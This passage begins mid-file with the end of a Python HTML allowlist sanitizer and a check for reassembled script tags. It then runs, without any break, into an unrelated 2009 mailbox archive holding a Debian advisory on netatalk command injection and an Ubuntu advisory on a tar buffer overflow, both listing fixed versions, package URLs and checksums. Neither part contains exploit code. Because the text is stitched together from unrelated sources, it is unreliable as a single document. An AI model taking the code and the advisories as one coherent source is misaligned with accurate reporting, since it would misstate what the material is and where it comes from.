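    if SCRIPT_RE.search(filtered):
        found.append("script.../script")
    return found


ALLOWED_TAGS = {"b", "i", "p", "br", "div", "span"}   # constructed policy
ALLOWED_ATTRS = {"class"}                             # constructed policy


class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; all text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            kept = "".join(
                ' %s="%s"' % (k, html.escape(v or "", quote=True))
                for k, v in attrs if k in ALLOWED_ATTRS
            )
            self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data))


def sanitize(t):
    parser = AllowlistSanitizer()
    parser.feed(t)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for sample in (SAMPLE_1, SAMPLE_2):
        cleaned = clean_template_model(sample)
        print(repr(cleaned), residual_tokens(cleaned), repr(sanitize(cleaned)))
```

A non-empty residual_tokens() result on filtered output is the signal that deleting substrings reassembled a blocked token; the allowlist version has no such state because it never edits markup in place.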
From - Thu Jan 15 16:42:48 2009
Date: Thu, 15 Jan 2009 22:00:47 +0100
From: Nico Golde <nion@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090115210047.GA8901@galadriel.inutil.org>
Subject: [SECURITY] [DSA 1705-1] New netatalk packages fix arbitrary code execution
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1705-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
January 15th, 2009                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : netatalk
Vulnerability  : missing input sanitising
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2008-5718
Debian Bug     : 510585

It was discovered that netatalk, an implementation of the AppleTalk
suite, is affected by a command injection vulnerability when processing
PostScript streams via papd.  This could lead to the execution of
arbitrary code.  Please note that this only affects installations that are
configured to use a pipe command in combination with wildcard symbols
substituted with values of the printed job.

For the stable distribution (etch) this problem has been fixed in
version 2.0.3-4+etch1.

For the upcoming stable distribution (lenny) this problem has been fixed
in version 2.0.3-11+lenny1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.4~beta2-1.

We recommend that you upgrade your netatalk package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.diff.gz
    Size/MD5 checksum:    27582 efc06139ef2adba4ca71c4ff9effefd2
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3.orig.tar.gz
    Size/MD5 checksum:  1920570 17917abd7d255d231cc0c6188ccd27fb
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.dsc
    Size/MD5 checksum:      822 eb3fc44340caed42978dea8b8e8cc53d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_alpha.deb
    Size/MD5 checksum:   869526 2a7d4250ee8380227231cd68cc70b5e4

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_amd64.deb
    Size/MD5 checksum:   751530 67f12f90fa7e11d8dfa791f36ee05e22

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_arm.deb
    Size/MD5 checksum:   729204 14b32580e4d93588404c1669074f9f09

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_hppa.deb
    Size/MD5 checksum:   800306 26eb091564c8077955d41ac42b585868

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_i386.deb
    Size/MD5 checksum:   706600 542cfc6b12f76ed4a068a389fa059372

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_ia64.deb
    Size/MD5 checksum:  1007572 a5393f96b01e65c8daece94babe663c2

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mips.deb
    Size/MD5 checksum:   776996 5d25c6809bfd2c3a6d3b29be1bd5e5e4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mipsel.deb
    Size/MD5 checksum:   773318 c6393e566664dbd1959e7c154ae90e37

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_powerpc.deb
    Size/MD5 checksum:   757606 ba364451858fc30ce3a4e2996ab316b0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_s390.deb
    Size/MD5 checksum:   770290 7970c3e8038bd51b6089cf824af789d6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_sparc.deb
    Size/MD5 checksum:   711964 fe24e2794125763c9548f522fd152a88


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklvo3wACgkQXm3vHE4uylrXCwCgsIdRo/L8Sf2ObeKwzj8Feuix
d+EAn1s6asea2Ygbs5BJjptm9xC+56wn
=uODl
-----END PGP SIGNATURE-----

From - Thu Jan 15 17:12:48 2009
Date: Thu, 15 Jan 2009 15:55:53 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-709-1] tar vulnerability
Message-ID: <20090115215553.GE4202@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-709-1           January 15, 2009
tar vulnerability
CVE-2007-4476
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  tar                             1.15.1-2ubuntu2.3

Ubuntu 7.10:
  tar                             1.18-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Dmitry V. Levin discovered a buffer overflow in tar. If a user or automated
system were tricked into opening a specially crafted tar file, an attacker
could crash tar or possibly execute arbitrary code with the privileges of the
user invoking the program.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.diff.gz
      Size/MD5:    31101 bd2a94f0578416e4ad7ed5d8e0eaab15
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.dsc
      Size/MD5:      582 6395ad2276cbfb04535c8e9a760184c2
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz
      Size/MD5:  2204322 d87021366fe6488e9dc398fcdcb6ed7d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_amd64.deb
      Size/MD5:   532580 8bf4846b9b2108f42886784c794c01f6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_i386.deb
      Size/MD5:   519940 3ddc9cb9cf77bf95d711eef4b3f7851c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_powerpc.deb
      Size/MD5:   534426 0385fa88092124b117af7cd37bc2c588

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_sparc.deb
      Size/MD5:   524246 8b1ad8790f52ca7282a76a96b6b134cc

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.diff.gz
      Size/MD5:    47111 588df897391765ca5523e6ab611ed32b
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.dsc
      Size/MD5:      679 bc6cbaab0f63ef2289c49344ed88d6df
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18.orig.tar.gz
      Size/MD5:  2381295 c5fc59099be4419d18f59fe8a7946017

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_amd64.deb
      Size/MD5:   384512 b9f347f8bb3f1209a2f2ba6b69a06eb6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_i386.deb
      Size/MD5:   339818 611afdfeb25440e65e3d722947408f5c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tar/tar_1.18-2ubuntu1.1_lpia.deb
      Size/MD5:   339942 1c900b255c7fb9d2f8f7b69a0d737d26

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_powerpc.deb
      Size/MD5:   359094 b790c9aa4e73dab09ca6892456970b71

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_sparc.deb
      Size/MD5:   342586 02aa39721b80469a26062f4c86e93b08

